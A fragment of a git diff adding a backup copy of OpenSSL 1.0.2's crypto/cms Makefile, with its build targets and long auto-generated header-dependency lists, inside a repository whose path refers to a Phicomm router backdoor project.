+cms_cd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_cd.c cms_lcl.h
+cms_dd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_dd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_dd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_dd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_dd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_dd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_dd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_dd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_dd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_dd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_dd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_dd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_dd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_dd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_dd.c cms_lcl.h
+cms_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_enc.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_enc.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_enc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_enc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_enc.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_enc.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_enc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_enc.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_enc.o: ../cryptlib.h cms_enc.c cms_lcl.h
+cms_env.o: ../../e_os.h ../../include/openssl/aes.h
+cms_env.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_env.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_env.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_env.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_env.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_env.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_env.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_env.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_env.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_env.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_env.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_env.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_env.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_env.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_env.o: cms_env.c cms_lcl.h
+cms_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cms_err.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_err.o: ../../include/openssl/x509_vfy.h cms_err.c
+cms_ess.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_ess.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_ess.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_ess.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_ess.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_ess.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_ess.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_ess.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_ess.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_ess.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_ess.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_ess.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_ess.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_ess.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_ess.o: ../cryptlib.h cms_ess.c cms_lcl.h
+cms_io.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_io.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_io.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_io.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_io.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_io.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_io.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_io.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_io.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_io.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_io.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_io.o: ../../include/openssl/x509_vfy.h cms.h cms_io.c cms_lcl.h
+cms_kari.o: ../../e_os.h ../../include/openssl/aes.h
+cms_kari.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_kari.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_kari.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_kari.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_kari.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_kari.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_kari.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_kari.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_kari.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_kari.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_kari.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_kari.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_kari.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_kari.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_kari.o: cms_kari.c cms_lcl.h
+cms_lib.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_lib.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_lib.o: ../../include/openssl/x509v3.h cms.h cms_lcl.h cms_lib.c
+cms_pwri.o: ../../e_os.h ../../include/openssl/aes.h
+cms_pwri.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_pwri.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_pwri.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_pwri.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_pwri.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_pwri.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_pwri.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_pwri.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_pwri.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_pwri.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_pwri.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_pwri.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_pwri.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_pwri.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_pwri.o: cms_lcl.h cms_pwri.c
+cms_sd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_sd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_sd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_sd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_sd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_sd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_sd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_sd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_sd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_sd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_sd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_sd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_sd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_sd.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_sd.o: cms_lcl.h cms_sd.c
+cms_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_smime.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_smime.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_smime.o: ../../include/openssl/opensslconf.h
+cms_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_smime.o: ../asn1/asn1_locl.h ../cryptlib.h cms_lcl.h cms_smime.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.bak
new file mode 100644
index 0000000..b05daf6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.bak
@@ -0,0 +1,279 @@
+#
+# OpenSSL/crypto/cms/Makefile
+#
+
+DIR=	cms
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cms_lib.c cms_asn1.c cms_att.c cms_io.c cms_smime.c cms_err.c \
+	cms_sd.c cms_dd.c cms_cd.c cms_env.c cms_enc.c cms_ess.c \
+	cms_pwri.c cms_kari.c
+LIBOBJ= cms_lib.o cms_asn1.o cms_att.o cms_io.o cms_smime.o cms_err.o \
+	cms_sd.o cms_dd.o cms_cd.o cms_env.o cms_enc.o cms_ess.o \
+	cms_pwri.o cms_kari.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  cms.h
+HEADER=	cms_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cms_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+cms_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_asn1.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_asn1.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_asn1.o: cms.h cms_asn1.c cms_lcl.h
+cms_att.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_att.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_att.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_att.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_att.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_att.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_att.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_att.o: ../../include/openssl/x509v3.h cms.h cms_att.c cms_lcl.h
+cms_cd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_cd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_cd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_cd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_cd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_cd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_cd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_cd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_cd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_cd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_cd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_cd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_cd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_cd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_cd.c cms_lcl.h
+cms_dd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_dd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_dd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_dd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_dd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_dd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_dd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_dd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_dd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_dd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_dd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_dd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_dd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_dd.o: ../../include/openssl/x509v3.h ../cryptlib.h cms_dd.c cms_lcl.h
+cms_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_enc.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_enc.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_enc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_enc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_enc.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_enc.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_enc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_enc.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_enc.o: ../cryptlib.h cms_enc.c cms_lcl.h
+cms_env.o: ../../e_os.h ../../include/openssl/aes.h
+cms_env.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_env.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_env.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_env.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_env.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_env.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_env.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_env.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_env.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_env.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_env.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_env.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_env.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_env.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_env.o: cms_env.c cms_lcl.h
+cms_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cms_err.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_err.o: ../../include/openssl/x509_vfy.h cms_err.c
+cms_ess.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_ess.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_ess.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_ess.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_ess.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_ess.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_ess.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_ess.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_ess.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_ess.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_ess.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+cms_ess.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_ess.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_ess.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_ess.o: ../cryptlib.h cms_ess.c cms_lcl.h
+cms_io.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_io.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_io.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_io.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_io.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_io.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_io.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_io.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_io.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_io.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_io.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_io.o: ../../include/openssl/x509_vfy.h cms.h cms_io.c cms_lcl.h
+cms_kari.o: ../../e_os.h ../../include/openssl/aes.h
+cms_kari.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_kari.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_kari.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_kari.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_kari.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_kari.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_kari.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_kari.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_kari.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_kari.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_kari.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_kari.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_kari.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_kari.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_kari.o: cms_kari.c cms_lcl.h
+cms_lib.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_lib.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_lib.o: ../../include/openssl/x509v3.h cms.h cms_lcl.h cms_lib.c
+cms_pwri.o: ../../e_os.h ../../include/openssl/aes.h
+cms_pwri.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+cms_pwri.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cms_pwri.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+cms_pwri.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cms_pwri.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cms_pwri.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cms_pwri.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cms_pwri.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_pwri.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+cms_pwri.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+cms_pwri.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_pwri.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_pwri.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_pwri.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_pwri.o: cms_lcl.h cms_pwri.c
+cms_sd.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_sd.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_sd.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_sd.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_sd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_sd.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_sd.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_sd.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+cms_sd.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+cms_sd.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+cms_sd.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+cms_sd.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cms_sd.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+cms_sd.o: ../../include/openssl/x509v3.h ../asn1/asn1_locl.h ../cryptlib.h
+cms_sd.o: cms_lcl.h cms_sd.c
+cms_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+cms_smime.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+cms_smime.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+cms_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+cms_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cms_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cms_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cms_smime.o: ../../include/openssl/opensslconf.h
+cms_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cms_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cms_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cms_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cms_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cms_smime.o: ../asn1/asn1_locl.h ../cryptlib.h cms_lcl.h cms_smime.c
